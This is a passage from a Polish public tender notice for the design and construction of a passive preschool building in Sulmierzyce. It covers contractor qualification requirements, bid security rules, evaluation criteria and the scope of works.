1278) lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej
obowiązujących przepisów,  doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu
składania ofert w postaci pełnienia funkcji kierownika budowy na inwestycji obejmującej budowę
pasywnego budynku o kubaturze powyżej 5 tys m3 f) dysponują osobą która pełnić będzie funkcję
kierownika robót branży instalacyjnej posiadającą:  uprawnienia do kierowania robotami budowlanymi w
specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo
budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11
września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r. poz. 1278)
lub odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących
przepisów,  doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu składania ofert w
postaci pełnienia funkcji kierownika robót branży instalacyjnej w zakresie sieci, instalacji i urządzeń
cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych na inwestycji obejmującej budowę
pasywnego budynku o kubaturze powyżej 5 tys m3 g) dysponują osobą która pełnić będzie funkcję
kierownika robót branży telekomunikacyjnej posiadającą uprawnienia do kierowania robotami budowlanymi
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń telekomunikacyjnych bez ograniczeń
określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2016r., poz. 290 ze zm.) i
rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji
technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub odpowiadające im zakresem uprawnienia,
które zostały wydane na podstawie wcześniej obowiązujących przepisów, h) dysponują osobą która pełnić
będzie funkcję kierownika robót branży elektrycznej posiadającą:  uprawnienia do kierowania robotami
budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i
elektroenergetycznych bez ograniczeń określone przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane
(Dz. U. z 2016r., poz. 290 ze zm.) i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 r. poz. 1278) lub
odpowiadające im zakresem uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących
przepisów,  doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu składania ofert w
postaci pełnienia funkcji kierownika robót branży elektrycznej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych na inwestycji obejmującej budowę pasywnego budynku o kubaturze
powyżej 5 tys m3  doświadczenie nabyte w okresie ostatnich dwóch lat przed upływem terminu składania
ofert w postaci pełnienia funkcji kierownika robót branży elektrycznej na inwestycji obejmującej budowę
instalacji fotowoltaicznej o mocy min. 50kW na dachu budynku Uwaga: Przez ww. uprawnienia budowlane
Zamawiający rozumie uprawnienia budowlane, o których mowa w ustawie Prawo budowlane oraz w
Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych
funkcji technicznych w budownictwie (Dz. U., poz. 1278 z późn. zm.) lub odpowiadające im ważne
uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub
odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce
zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 22 grudnia 2015 r. o zasadach
uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2016 r.
poz. 65). W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA)  stron
umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ustawy z dnia 15 grudnia 2000 r. o
samorządach zawodowych architektów, inżynierów budownictwa (Dz.U. z 2014 r., poz. 1946 z późn. zm.),
osoby wyznaczone do realizacji zamówienia posiadają uprawnienia budowlane do kierowania robotami
budowlanymi, wyszczególnione wyżej jeżeli:  nabyły kwalifikacje zawodowe do wykonywania działalności w
budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na
terytorium Rzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowania
robotami budowlanymi, oraz  posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w
przypadku braku decyzji o uznaniu kwalifikacji zawodowych zostały spełnione w stosunku do tych osób
wymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000 r. o samorządach
zawodowych architektów, inżynierów budownictwa, dotyczące świadczenia usług transgranicznych.
Zamawiający dopuszcza łączenie funkcji projektanta z funkcją kierownika robót danej branży pod
warunkiem, że osoba ta posiada uprawnienia i doświadczenie wymagane dla obu tych funkcji. Wykonawca
potwierdza spełnianie warunku w pierwszej kolejności poprzez złożenie wraz z ofertą Oświadczenia
własnego, o którym mowa w pkt. 7.1. SIWZ. Część 2 zamówienia: Zamawiający nie stawia szczegółowych
wymagań w zakresie spełniania tego warunku.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu dla Części 1
zamówienia: a) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzająca
wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie
wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, b) wykaz robót budowlanych
wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli
okres prowadzenia działalności jest krótszy  w tym okresie wraz z podaniem ich rodzaju, wartości, daty,
miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów
określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy
roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym
dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz
którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze
wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty  z wykorzystaniem wzoru
określonego w Rozdziale III SIWZ, c) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia
publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie
robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,
doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  z
wykorzystaniem wzoru określonego w Rozdziale III SIWZ, Oświadczenia i dokumenty potwierdzające
spełnianie warunków udziału w postępowaniu dla Części 2 zamówienia - Nie wymagane<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Do oferty Wykonawca zobowiązany jest załączyć: 1) Formularz ofertowy, 2)Dokument lub dokumenty, z
których będzie wynikać upoważnienie do podpisania oferty, np. aktualny odpis z właściwego rejestru,
aktualne zaświadczenie o wpisie do centralnej ewidencji i informacji o działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy, inne. Jeżeli dokumenty, o których mowa w zdaniu pierwszym
można uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów
publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów
realizujących zadania publiczne (Dz. U. z 2014 r. poz. 1114 ze zm.) wykonawca podaje tylko adres URL i
jeżeli potrzeba kod do pobrania dokumentu. Wykonawcy z Polski nie muszą podawać tych informacji. W/w
dokumenty można złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę.
Jeżeli uprawnienie do reprezentacji osoby podpisującej ofertę nie wynika z załączonego dokumentu, o
którym mowa w zdaniu pierwszym, do oferty należy dołączyć także pełnomocnictwo w oryginale lub w
postaci kopii poświadczonej notarialnie. 2. Wykonawca może w celu potwierdzenia spełniania warunków
udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego
części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej
innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.
Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu,
że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności
przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na
potrzeby realizacji zamówienia. Zobowiązanie, o którym mowa w zdaniu pierwszym wykonawca załącza do
oferty w formie pisemnej. Z dokumentu (np. zobowiązania), o którym mowa powyżej musi wynikać w szczególności: 1) zakres dostępnych wykonawcy zasobów innego podmiotu; 2) sposób wykorzystania
zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego; 3) zakres i okres
udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 4) czy podmiot, na zdolnościach
którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,
kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane
zdolności dotyczą. 3. Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji z
otwarcia ofert, o której mowa w art. 86 ust. 3 Pzp, bez uprzedniego wezwania przez zamawiającego,
przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy
kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 Pzp z innym wykonawcą lub wykonawcami, którzy złożyli
oferty lub oferty częściowe. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że
powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie
zamówienia.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />9.1. Oferta składana na wykonanie Części 1 zamówienia musi być zabezpieczona wadium w wysokości:
150.000,00 zł (słownie: sto pięćdziesiąt tysięcy złotych). Zamawiający nie wymaga wniesienia wadium dla
Części 2 zamówienia. 9.2. Wadium może być wniesione w: 1) pieniądzu; 2) poręczeniach bankowych lub
poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej; z tym że poręczenie kasy jest zawsze
poręczeniem pieniężnym; 3) gwarancjach bankowych; 4) gwarancjach ubezpieczeniowych; 5) poręczeniach
udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o
utworzeniu Polskiej Agencji Rozwoju (Dz. U. z 2014r. poz. 1804 oraz z 2015r. poz. 978 i 1240). 9.3. Termin
wnoszenia wadium upływa wraz z terminem składania ofert. 9.4. Wadium wnoszone w pieniądzu należy
wpłacać przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczym Kleszczów Oddział w
Sulmierzycach. Nr rachunku: 27 8978 0008 0030 1846 2000 0140 z dopiskiem: Wadium  Budowa
pasywnego budynku przedszkola w miejscowości Sulmierzyce na dz. ew. 1226/1 obręb 17 Sulmierzyce. 9.5.
Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną
na konto zamawiającego przed upływem terminu składnia ofert. 9.6. Wadium wnoszone w postaci
niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić
dokument wadialny w taki sposób, aby jego zwrot przez zamawiającego nie naruszył integralności oferty i
dołączonych oświadczeń wraz z dokumentami (np. umieszczony w koszulce, co pozwoli na swobodne
oddzielenie wadium od reszty dokumentów). 9.7. Z treści gwarancji/poręczenia winno wynikać
bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w
art. 46 ust. 4a i 5 Pzp. 9.8. Zamawiający zwróci wniesione wadium wszystkim wykonawcom niezwłocznie po
wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta
zostanie wybrana jako najkorzystniejsza. 9.9. Wykonawcy, którego oferta zostanie wybrana jako
najkorzystniejsza, zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia
publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. 9.10. Zamawiający zwróci
niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
9.11. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium
zgodnie z pkt. 9.8, jeżeli w wyniku rozstrzygnięcia odwołania, jego oferta zostanie wybrana jako
najkorzystniejsza. Wykonawca ten wnosi wadium w terminie określonym przez zamawiającego. 9.12.
Wykonawca, którego oferta została wybrana, a który wniósł wadium w pieniądzu, może wyrazić zgodę na
zaliczenie kwoty wadium na poczet zabezpieczenia należytego wykonania umowy. 9.13. Zamawiający
zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art.
26 ust. 3 i 3a Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Pzp, oświadczenia, o którym mowa w art.
25a ust. 1 Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2
pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako
najkorzystniejszej 9.14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego
oferta została wybrana:  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;  zawarcie
umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
9.15. Oferta wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona
w oparciu o art. 89 ust. 1 pkt 7b Pzp. 9.16. Okoliczności i zasady zwrotu wadium, jego przepadku oraz
zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania umowy określa ustawa Pzp.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Część 1 zamówienia - 1) cena oferty (C)</td><td>60.00</td></tr><tr><td>Część 1 zamówienia - 2) aspekt społeczny  zatrudnienie osób bezrobotnych (S)</td><td>11.00</td></tr><tr><td>Część 1 zamówienia - 3) aspekt środowiskowy  system mycia kół i podwozi (Ś)</td><td>9.00</td></tr><tr><td>Część 1 zamówienia - 4) doświadczenie osób skierowanych przez wykonawcę do realizacji zamówienia (D)</td><td>6.00</td></tr><tr><td>Część 1 zamówienia - 5) długość okresu gwarancji jakości (G)</td><td>14.00</td></tr><tr><td>Część 2 zamowienia - 1) cena oferty (C)</td><td>60.00</td></tr><tr><td>Część 2 zamówienia - 2) wysokość nasadzanych drzew i krzewów (W)</td><td>40.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której
dokonano wyboru Wykonawcy. Zakres, charakter zmian oraz warunki wprowadzenia zmian opisano w projekcie
umowy (Rozdział IV Specyfikacji Istotnych Warunków Zamówienia).<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem
zamówienia jest zaprojektowanie oraz budowa pasywnego budynku przedszkola w miejscowości Sulmierzyce na
dz.ew.1226/1 obręb 17 Sulmierzyce wraz z zagospodarowaniem terenu, na który składa się budowa placu
zabaw, miejsc postojowych, terenów utwardzonych i zjazdu publicznego oraz wyposażeniem budynku zgodnie z
wymaganiami określonymi w Programie funkcjonalno  użytkowym (dalej PFU). Zamawiający zastrzega, iż
Wykonawca związany jest koncepcją architektoniczną budynku przedstawioną w PFU. Zakres zamówienia
obejmuje w szczególności:  Opracowanie projektu budowlanego oraz projektu robót geologicznych, 
Uzyskanie niezbędnych warunków, opinii, pozwoleń, uzgodnień i zatwierdzeń opracowanej dokumentacji, 
Uzyskanie pozwolenia na budowę,  Opracowanie projektów wykonawczych w zakresie niezbędnym do
wykonania robót budowlanych,  Wykonanie robót budowlanych na podstawie opracowanych projektów, 
Zgłoszenie zakończenia robót i uzyskanie pozwolenia na użytkowanie,  Wyposażenie budynku i terenu w
zakresie elementów stałych (Zamawiający uznaje za wyposażenie stałe wszelkie wyposażenie opisane w PFU).
Zamawiający wymaga od Wykonawcy uwzględnienia na etapie opracowywania projektów stosowania
wytycznych wynikających w szczególności z poniższych publikacji:  Realizacja zasady równości szans i
niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami - Poradnik dla realizatorów projektów i
instytucji systemu wdrażania funduszy europejskich 2014-2020 .  Wytyczne w zakresie realizacji zasady równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami oraz zasady równości
szans kobiet i mężczyzn w ramach funduszy unijnych na lata 2014-2020  Minister Infrastruktury i Rozwoju 
maj 2015.  Przepisy prawa budowlanego - Art. 5 1. Obiekt budowlany wraz ze związanymi z nim urządzeniami budowlanymi należy, biorąc pod uwagę przewidywany okres użytkowania, projektować i budować w sposób
